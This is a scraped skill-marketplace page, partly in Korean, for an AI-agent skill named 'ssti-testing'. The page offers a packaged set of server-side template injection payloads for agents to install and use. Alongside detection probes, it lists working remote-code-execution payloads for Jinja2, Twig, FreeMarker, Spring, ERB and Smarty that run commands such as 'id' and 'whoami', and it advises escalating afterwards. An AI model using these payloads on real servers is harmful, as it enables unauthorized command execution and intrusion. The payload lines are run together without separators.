원클릭으로
ssti-testing
Server-side template injection detection, engine identification, and RCE
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
Server-side template injection detection, engine identification, and RCE
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
Business logic vulnerability detection — workflow bypass, price manipulation, state abuse, and application-specific flaws
Detect PII, credentials, and corporate sensitive data in API responses, source code, files, headers, and database extracts
Detect and exploit SQL injection vulnerabilities in web application parameters
Test for authentication and authorization flaws including credential attacks, session issues, and access control bypasses
Detect and exploit cross-site scripting vulnerabilities in web applications
Discover hidden parameters, test values, and identify input handling anomalies
| name | ssti-testing |
| description | Server-side template injection detection, engine identification, and RCE |
| origin | RedteamOpencode |
{{7*7}} — look for 49 in response${7*7}, <%= 7*7 %>, #{7*7}, {7*7}, [= 7*7 ]{{'foo'+'bar'}} → foobar${{<%[%'"}}%\. — observe which causes errors{{config}} — dumps Flask config{{config.items()}} — enumerate settings{{self.__class__.__mro__}} — MRO chain{{request.application.__globals__}}{{_self.env.getFilter('id')}} (Twig <2){{['id']|filter('system')}} (Twig 3){{app.request.server.all|join(',')}} — server vars${7*7} → 49<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}${object.class.forName("java.lang.Runtime")}{% set cmd = 'id' %}{% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec(cmd) %}__${T(java.lang.Runtime).getRuntime().exec('id')}__::.x<%= 7*7 %> → 49<%= system('id') %><%= id %>{php}echo id;{/php} (Smarty <3){system('id')}{{config.__class__.__init__.__globals__['os'].popen('id').read()}}{{['id']|filter('system')}}<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}<%= whoami %>id, whoami, then escalatesubprocess.Popen or os.popen__subclasses__(), __globals__, __builtins__